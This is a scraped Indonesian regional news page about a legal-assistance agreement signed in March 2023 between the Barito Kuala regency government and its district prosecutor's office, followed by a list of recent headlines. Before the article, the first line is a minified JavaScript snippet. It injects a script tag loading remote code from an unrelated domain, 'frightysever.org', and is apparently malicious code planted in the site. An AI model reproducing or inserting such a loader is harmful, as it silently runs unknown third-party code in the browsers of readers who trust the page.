(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
ADV BARITO KUALA

Sinergi Pemkab Batola dan Kejaksaan Negeri Batola dalam Penanganan Masalah Hukum


KANALKALIMANTAN.COM, MARABAHAN- Pemkab Batola lakukan penandatanganan kerjasama penanganan masalah bidang hukum perdata dan Tata Usaha Negara (TUN) dengan Kejaksaan Negeri Batola. Selain itu, digelar pula paparan hasil pendampingan hukum oleh Kajari Batola Eben Neser Silalahi, Senin (27/3/2023).

Berlangsung di Aula Selidah Kantor Bupati Barito Kuala (Batola) di Marabahan. Penandatanganan dilakukan langsung oleh Penjabat (Pj) Bupati Batola Mujiyat, S. Sn, M. Pd. Dengan dihadiri pula oleh Sekretaris Daerah Batola Ir. H. Zulkipli Yadi Noor, M. SC, serta para Kepala SKPD dan Camat yang menerima hasil pendampingan hukum dari Kajari Batola.

Dalam paparannya Eben Neser menyebut tim JPN Kejari Batola paling banyak melakukan pendampingan pada Dinas Pekerjaan Umum Batola.
“Adanya pekerjaan yang tidak rapi maupun kendala teknis item yang tidak terpasang sehingga perlu pendampingan tim JPN, “ungkapnya.

Eben sebut permasalahan juga ditemukan adanya konsultan yang melakukan pengawasan melebihi dua pekerjaan sehingga pengawasan dinilai tidak efektif.
“Sudah kita lakukan teguran agar tidak lebih dari dua pekerjaan dilakukan pengawasan, agar lebih efektif, “ sebutnya.

Baca juga: Pamit Main Sendiri, Bocah 10 Tahun Nyaris Tenggelam di Irigasi Sekumpul

Tambahnya, terjadi pula penyerahan barang/pekerjaan dari pelaksana kepada satuan kerja atau penerima barang yang dituliskan di dalam Berita Acara Serah Terima Pekerjaan/Barang (PPHO), tetapi tidak dijelaskan secara detail sesuai dengan isi dan pada kontrak pengadaan barang/jasa.

Pj Bupati sampaikan rasa senangnya dengan adanya langkah pendampingan dari Kejaksaan Negeri Batola. Menurutnya dengan adanya pendampingan ini bisa menghindari hal-hal yang tidak diinginkan.

“Dengan pendampingan dari Kejari ini, InsyaAllah kita akan terasa nyaman ketika melangkah. Mengingat tentunya kita akan lebih tertib administrasi”, sebut Pj Bupati.
Pj berharap dengan pendampingan ini ketika ditemukan hal-hal yang perlu dibetulkan bisa di berikan pendampingan dan dibenarkan.

“Ini juga bentuk Chemistry yang baik antara Kejari Batola dan Pemkab Batola yang berujung pada perbaikan tata kelola pemerintahan di Batola, “ ungkap pria alumni ISI Yogyakarta ini. (Kanalkalimantan.com/Rdy)

Reporter : Rdy
Editor : Rdy


Risa

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

7 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

8 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

8 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

9 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

10 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

12 jam ago

This website uses cookies.